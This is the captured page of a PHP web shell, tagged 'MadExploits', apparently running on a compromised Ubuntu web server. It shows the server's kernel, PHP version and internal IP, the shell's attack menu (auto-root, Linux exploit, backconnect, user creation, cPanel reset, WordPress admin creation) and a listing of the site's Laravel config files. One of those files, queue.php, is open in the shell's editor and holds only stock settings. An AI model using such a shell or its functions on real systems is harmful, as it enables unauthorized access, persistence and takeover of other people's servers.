Linux ip-172-31-29-64 6.8.0-1050-aws #53~22.04.1-Ubuntu SMP Fri Mar 13 21:34:27 UTC 2026 x86_64
Apache/2.4.52 (Ubuntu)
: 172.31.29.64 | : 216.73.216.137
Cant Read [ /etc/named.conf ]
5.6.40-77+ubuntu22.04.1+deb.sury.org+1
ubuntu
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
exclusive.maalgaadi /
config /
[ HOME SHELL ]
Name
Size
Permission
Action
api.php
6.84
KB
-rwxrwxrwx
app.php
8.69
KB
-rwxrwxrwx
auth.php
3.16
KB
-rwxrwxrwx
broadcasting.php
1.37
KB
-rwxrwxrwx
cache.php
2.09
KB
-rwxrwxrwx
compile.php
983
B
-rwxrwxrwx
constants.php
678
B
-rwxrwxrwx
database.php
4.61
KB
-rwxrwxrwx
excel.php
23.13
KB
-rwxrwxrwx
fcm.php
508
B
-rwxrwxrwx
filesystems.php
2.49
KB
-rwxrwxrwx
indipay.php
2.55
KB
-rw-rw-r--
jwt.php
5.21
KB
-rwxrwxrwx
mail.php
4.24
KB
-rwxrwxrwx
push-notification.php
290
B
-rwxrwxrwx
queue.php
2.65
KB
-rwxrwxrwx
services.php
1.03
KB
-rwxrwxrwx
session.php
5.19
KB
-rwxrwxrwx
view.php
1017
B
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : queue.php
<?php return [ /* |-------------------------------------------------------------------------- | Default Queue Driver |-------------------------------------------------------------------------- | | The Laravel queue API supports a variety of back-ends via an unified | API, giving you convenient access to each back-end using the same | syntax for each one. Here you may set the default queue driver. | | Supported: "null", "sync", "database", "beanstalkd", | "sqs", "iron", "redis" | */ 'default' => env('QUEUE_DRIVER', 'sync'), /* |-------------------------------------------------------------------------- | Queue Connections |-------------------------------------------------------------------------- | | Here you may configure the connection information for each server that | is used by your application. A default configuration has been added | for each back-end shipped with Laravel. You are free to add more. | */ 'connections' => [ 'sync' => [ 'driver' => 'sync', ], 'database' => [ 'driver' => 'database', 'table' => 'jobs', 'queue' => 'default', 'expire' => 60, ], 'beanstalkd' => [ 'driver' => 'beanstalkd', 'host' => 'localhost', 'queue' => 'default', 'ttr' => 60, ], 'sqs' => [ 'driver' => 'sqs', 'key' => 'your-public-key', 'secret' => 'your-secret-key', 'queue' => 'your-queue-url', 'region' => 'us-east-1', ], 'iron' => [ 'driver' => 'iron', 'host' => 'mq-aws-us-east-1.iron.io', 'token' => 'your-token', 'project' => 'your-project-id', 'queue' => 'your-queue-name', 'encrypt' => true, ], 'redis' => [ 'driver' => 'redis', 'connection' => 'default', 'queue' => 'default', 'expire' => 60, ], ], /* |-------------------------------------------------------------------------- | Failed Queue Jobs |-------------------------------------------------------------------------- | | These options configure the behavior of failed queue job logging so you | can control which database and table are used to store the jobs that | have failed. You may change them to any database / table you wish. | */ 'failed' => [ 'database' => env('DB_CONNECTION', 'mysql'), 'table' => 'failed_jobs', ], ];
Close